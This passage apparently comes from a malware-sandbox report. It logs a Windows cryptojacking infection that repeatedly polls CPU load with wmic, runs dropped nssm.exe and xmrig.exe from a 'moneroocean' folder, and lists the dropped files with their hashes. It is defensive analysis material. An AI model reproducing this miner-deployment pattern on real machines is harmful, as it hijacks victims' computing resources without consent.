C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3356

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3552

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:664

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:656

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1968

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4768

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4228

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:504

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1688

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2272

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4844

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1388

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1900

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2736

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5076

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1992

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4860

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5072

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4736

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2900

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:600

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3576

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1936

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4268

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1864

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:32

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3804

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4468

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1856

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3556

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4160

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3172

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4576

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3124

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4568

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4848

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1580

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3720

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3332

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2120

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2588

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4680

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:196

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1384

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1148

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4400

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3764

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2196

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2552

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4476

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2292

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4304

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1744

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2696

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2736

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:828

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3400

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1420

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3916

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2524

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3608

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4236

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1860

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3576

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2336

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2324

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4852

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2136

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4944

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:816

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3860

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2276

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4296

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5048

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4048

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1472

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2280

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1008

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4168

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1092

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4216

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3716

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2688

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3328

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3216

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4544

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4892

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4768

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4436

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:504

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1988

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1688

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1608

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4212

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1440

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2388

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2736

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5092

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5056

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1536

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4144

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3644

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5060

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4604

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5064

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4268

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1920

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:932

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2420

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4012

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2248

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:204

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:3688

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5084

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
68b45d81eff518e1469b025bddeefd7a

SHA1
93a0561dce19b3dd61d75a7fc91fda5a083a61ed

SHA256
a9699c9da61cccf08f6d68f002004cfc389ef796485433700a273bf8d0e3c035

SHA512
0410dd1328083c3f32661005a5c14c7c356dd659654acb12cf3c3ed444a51fe6faa64f874470e0b0b2e6105ffc32aea875793564854eac8c4cc796056151ef96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1e607932bd3879bbdcb88dc2c3e2f400

SHA1
85d501d3828a874d6c0b131c19fb0ed0f2e49c51

SHA256
25359acde242dcdb3780bc8638d7412bcd2d4318654649d5eda1cc7ff6e59f5f

SHA512
c73256d4deb99813c7c5e309342d25ee9e95916ee47b29dde6ee7996dc9647326533d759cc5f6e0bd66d169ec099173704dbc92481fecdff5f8a52fd3e22e25d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
fd2037b31bf0a6352b80fd80e9456371

SHA1
004236a7cbf7ab6269deaf59de88f53514212eeb

SHA256
09b6420d3db9dcc15e4e3dc2107780e38ca101911eee7281831532338b08452a

SHA512
ee43947e23250ca8b3d3d4497036a43f943d34a036c1408dba3d50c51e3474aa12b4a571fda71317cfb00d22f101571f4a32d806caa3ad60fc46827570742b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
65de404410c40f345b64372280b5dc7e

SHA1
934241e1f947802ae99ac6da80fc2163d51ba32c

SHA256
e9a2e6e241969fd61cac252be4357d8c79bbc5e293503cbaa37bde0b7adb0bc7

SHA512
163e15235d0b94d6cde29cf1c17182bf1c44689e830369806765d9354d3a92549f4ae005309e710f42fd65d82292dabe33d9bcfacb7691c3b7165e9b33e25870

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c17955571f1af41b0341e6dd3390b439

SHA1
8112386a7bfc5ab17b4806ed87fabb5876644df5

SHA256
5dcbff82434d1d136b980f51f588097bb3d6faaeff8b5183c1c7da03f77b1c7d

SHA512
c8f98c32994ac9f1e746bbc52ad5eb1d735b4ac9ab8cc143430efd5cd5f6789f90ebe1904e3da9ae8a40c034a3c44e3ee48ed4d412a84a3eb4dab279c8a10a6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8069bc3977f2b4e7b6a1ff4a2c9792f5

SHA1
16df90852f2b0c6b3074c726a8576d51c05d544d

SHA256
94892ebc4ad78b2b07ecf6f3f640230fae733462806b52960ed7e49a06e43202

SHA512
4522b88b25542840c545dad31f9f75d918c1d68f3a44b2e737e4395f9e9564bd63c1e09a9e4a08ba6b5470fff7963599405fd4c03b323bc1f0a8f99009d12ae9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6cf9b4f8067898d28a8a5d1ed677c405

SHA1
240c4b1aca1e78aaaac2eeeb6a2aa3a655f4b488

SHA256
08f0971487e2fce1343a0487baa3dc12b0279512944436376d33e53d687abbd2

SHA512
27cacb4a903040aaeeaceb2e672da59d9deaa749ef6976d7fbcd9c49466cea2e0c5f8b96d9fdc622aaa11ff90a73c0b2bc705e16de72edbfdc941c95adc55e64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c002bc008bfb328d1db79417a5b0d55d

SHA1
9e9ab30c8eacd99c65687faa8cf54979ddd58222

SHA256
aee859436b198e020a8cf1724e9e9d957ff6c98ea50c9b50e2e66db81c33aeb9

SHA512
d35b560bc3dab1ee626c2c06193ac718f5bc76f7e30ce67fd62ea3eb993000ad196e77ca88c3dc778b5685659c41769060d04edfaf0b4e15d78452c23e75e934

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4066d93d4e607cdda544a0082aefe2e9

SHA1
84a74c9439b6d1ec48097c8dee85042119d9994f

SHA256
04c63fe552846eacb8f465990c8d31e9eb1b63efe1db15900997127f239a0109

SHA512
fc98a940399abae569fff8f160db609a093fb3b91c622a3418c7550ccef47108d0114411edd47469b193e9e9e642a96f5f9b36e3531cddf9d1c6f3b27a27493a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d3a9281f35a63bb29e2d54acf948ce71

SHA1
de5d152c27c9b662e6f217a2f65eaef28d462f99

SHA256
aa6f4716556053311e3f307c714249abff7f6ff5fafa1bcf290f22b8b25c8e1b

SHA512
286fc7111cc8d277ce9be3d3488dc40e8bbec3a98a56d5b09ff6f39b7f70b38c6cdf7d1f384cc67b21e9556256f616b64986b7cc7b8d0039cd1fa8ba8f2308e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
64e70711e58d88b8a73ba790ce7bd7de

SHA1
4e0e7df25cafcc3f3ef5ebc7ce2bbc54a5ea5dbb

SHA256
979e644a67a5ba54a2ca39f018eb7bb7294494412d61badf93971a561f018baf

SHA512
8537ca09be7c7b9adc477a84396b9f5551f1e2605e07b8654641babf3a43ffb8af237a496e9accca814b4ef2c031a20f7fd79506e65de88d322883b53f4dda3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f4e898c869f17a1ea2b21150ff38dd9a

SHA1
38ec893f56aa10bbc55182f85add4051c4c73f07

SHA256
9e494daff6289e0bd408eff9af72c171c921c80f15c95b281e5882618793c538

SHA512
135579afabf2faa25ea85d9f71d2dcd14811b7b5df7986b6d9a610a72a77c2f99acccef51d02a60ab2e99fcceafd263217662898a92d8afb5845f4377c374c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ytsiqanf.rwm.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5FE3.tmp.bat
Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
c2c1487f2a3e31dc33b66700ab04500d

SHA1
87d72a53fb7c8d6869f235fbb1e9254c011f7394

SHA256
770f055206371d0355cd7a39758a25709f403c06c07276c80a7c82c49997fcca

SHA512
46d04a4184298a031a66480966eb06cf9fbd940558267728334eb7f3cd56247236f8e83678f49c96e53c65e01cffb06b1e39d9210716280a13b05c46588bfc45

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
3803edd775ef3146bc4bb2402e220329

SHA1
694c16af30516cde52ad9234960eead4283b6d8d

SHA256
2908db3c339c3a31dda653e3662945e7c0008f5a34ceab96505cb09a1581ba65

SHA512
cb09b0ab708f897181202620b549d3ff0609fec49820ef9c99d0f6772420ba3f0a5ef61dd5e86bb7875c26c48ec9ce9bc5dc54bcf4cb3ff4afbabe6d2503c964

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
3601ff16e4fdda84a2ca37ccbadf71e4

SHA1
56acc176976180a3fdb38a9ad770974a22fb2a63

SHA256
87a15b64dce5c3f1e71d6e7beef3217adfe741b76fa111baabf22ba640d60a4e

SHA512
f86706bf28f2442c61998fca0635e4b028529960bf415432265faca01452e06e5706a39174f3f0957ba60d8d3ede47acad2b2b86730483c3c438eb34057d6251

Download Submit
C:\Users\Admin\moneroocean\nssm.exe
Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe
Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip
Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
